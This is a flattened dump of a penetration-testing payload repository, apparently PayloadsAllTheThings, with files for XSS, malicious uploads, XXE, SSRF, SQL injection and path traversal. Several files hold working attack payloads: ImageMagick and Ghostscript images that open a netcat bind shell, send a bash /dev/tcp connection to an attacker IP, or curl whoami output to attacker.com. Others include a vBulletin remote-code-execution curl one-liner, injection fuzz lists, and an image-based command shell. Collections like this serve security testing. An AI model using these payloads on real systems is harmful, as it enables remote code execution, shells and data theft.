├── XSS Injection ├── Files │ ├── "> │ ├── '> │ ├── xss.cer │ ├── xss.htm │ ├── xss.hxt │ ├── ">: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/'>: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.cer: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.htm: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.hxt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE ZIP Symbolic Link/passwd: -------------------------------------------------------------------------------- 1 | /etc/passwd -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/poc.js: -------------------------------------------------------------------------------- 1 | app.alert("XSS") -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | BuildPDF/ 2 | .vscode 3 | .todo 4 | AWS Amazon Lambda/ -------------------------------------------------------------------------------- /XSS Injection/Files/"> 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php3: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php4: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php5: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php7: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phpt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.pht: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phtml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension HTML/xss.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.jpg.php: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/exec.shtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf: -------------------------------------------------------------------------------- 1 | *.sh:/bin/sh 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pht: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpeg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phar: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php3: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php4: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php5: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php7: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phpt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/include.shtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS1.svg: -------------------------------------------------------------------------------- 1 | </desc><script>alert(1)</script> 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/xml.xsd: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.dtd: -------------------------------------------------------------------------------- 1 | alert(1) 
-------------------------------------------------------------------------------- /XSS Injection/Files/xss.mno: -------------------------------------------------------------------------------- 1 | alert(1337) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.rdf: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.svgz: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.vml: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.wsdl: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xht: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xhtml: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsd: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsf: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsl: 
-------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xslt: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.gif?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS3.svg: -------------------------------------------------------------------------------- 1 | </title><script>alert(3)</script> 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.html.demo: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.url.url: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.github/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/.github/banner.png -------------------------------------------------------------------------------- 
/Upload Insecure Files/EICAR/eicar.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh: -------------------------------------------------------------------------------- 1 | ln -s /etc/passwd link 2 | zip --symlinks test.zip link 3 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS2.svg: -------------------------------------------------------------------------------- 1 | </foreignObject><script>alert(2)</script> 2 | -------------------------------------------------------------------------------- /SAML Injection/Images/XSLT1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SAML Injection/Images/XSLT1.jpg -------------------------------------------------------------------------------- /Web Sockets/Images/sqlmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/sqlmap.png -------------------------------------------------------------------------------- /XSS Injection/Files/SWF_XSS.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/SWF_XSS.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh: -------------------------------------------------------------------------------- 1 | echo "Content-type: text/html" 2 | echo "" 3 | echo `id` 4 | 
-------------------------------------------------------------------------------- /GraphQL Injection/Images/htb-help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/GraphQL Injection/Images/htb-help.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/README.txt: -------------------------------------------------------------------------------- 1 | # How to use 2 | b.php?c=ls 3 | # Upload one of the resize-resistant images from this folder so that it ends up served as PHP (named b.php in the example); the value of the c parameter is then run as a command on the server. This is an unauthenticated command shell: only use it on targets you are authorised to test, and remove the file afterwards. 4 | 5 | Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l -------------------------------------------------------------------------------- /CSRF Injection/Images/CSRF-CheatSheet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/CSRF Injection/Images/CSRF-CheatSheet.png -------------------------------------------------------------------------------- /SAML Injection/Images/SAML-xml-flaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SAML Injection/Images/SAML-xml-flaw.png -------------------------------------------------------------------------------- /Web Sockets/Images/WebsocketHarness.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/WebsocketHarness.jpg -------------------------------------------------------------------------------- /XSS 
Injection/Files/InsecureFlashFile.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/InsecureFlashFile.swf -------------------------------------------------------------------------------- /XSS Injection/Files/onclick-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/onclick-xss-ecs.jpeg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_text_xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_text_xss.png -------------------------------------------------------------------------------- /XSS Injection/Images/DwrkbH1VAAErOI2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Images/DwrkbH1VAAErOI2.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/mouseover-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/mouseover-xss-ecs.jpeg -------------------------------------------------------------------------------- /SQL Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /SQL Injection/Images/Unicode_SQL_injection.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/aws-cli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/aws-cli.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xss.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension Flash/xss.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pgif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension PHP/shell.pgif -------------------------------------------------------------------------------- /Web Sockets/Images/websocket-harness-start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/websocket-harness-start.png -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE B64 Encoded.xml: 
-------------------------------------------------------------------------------- 1 | %init; ]> 2 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_PDF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_PDF.png -------------------------------------------------------------------------------- /Insecure Direct Object References/Images/idor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Insecure Direct Object References/Images/idor.png -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MYSQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_Parser.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_stream.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_stream.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/WeakParser.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/WeakParser.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/result.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension PDF JS/result.pdf -------------------------------------------------------------------------------- /Server Side Template Injection/Images/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Template Injection/Images/serverside.png -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi 
-------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension Flash/xssproject.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/GIF_exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/GIF_exploit.gif -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_metadata.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_metadata.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_Fuzz.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1' 3 | 1" 4 | [1] 5 | 1` 6 | 1\ 7 | 1/*'*/ 8 | 
1/*!1111'*/ 9 | 1'||'asd'||' 10 | 1' or '1'='1 11 | 1 or 1=1 12 | 'or''=' -------------------------------------------------------------------------------- /Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/Parser & Curl < 7.54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/Parser & Curl < 7.54.png -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg 
HLS/read_passwd_bypass.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_exif_corrupted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS 
Injection/Files/payload_in_all_known_exif_corrupted.png -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://IP_ATTAQUANT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss_comment_exif_metadata_double_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png -------------------------------------------------------------------------------- /XSS Injection/Files/xss_comment_exif_metadata_single_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .htaccess 2 | # 3 | SetHandler server-status 4 | SetHandler server-info 5 | 6 | -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE - etc passwd.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; 7 | 
-------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: swisskyrepo 4 | ko_fi: swissky # Replace with a single Ko-fi username 5 | custom: https://www.buymeacoffee.com/swissky 6 | -------------------------------------------------------------------------------- /CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh: -------------------------------------------------------------------------------- 1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure 
Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf: -------------------------------------------------------------------------------- 1 | %!PS 2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) 3 | .putdeviceparams 4 | quit -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'text:/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_expect.svg: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'pango:@/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration 
Python __init__.py/python-settings-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/simple-check.txt: -------------------------------------------------------------------------------- 1 | etc/passwd 2 | etc/passwd%00 3 | etc%2fpasswd 4 | etc%2fpasswd%00 5 | etc%5cpasswd 6 | etc%5cpasswd%00 7 | etc%c0%afpasswd 8 | etc%c0%afpasswd%00 9 | C:\boot.ini 10 | C:\WINDOWS\win.ini -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 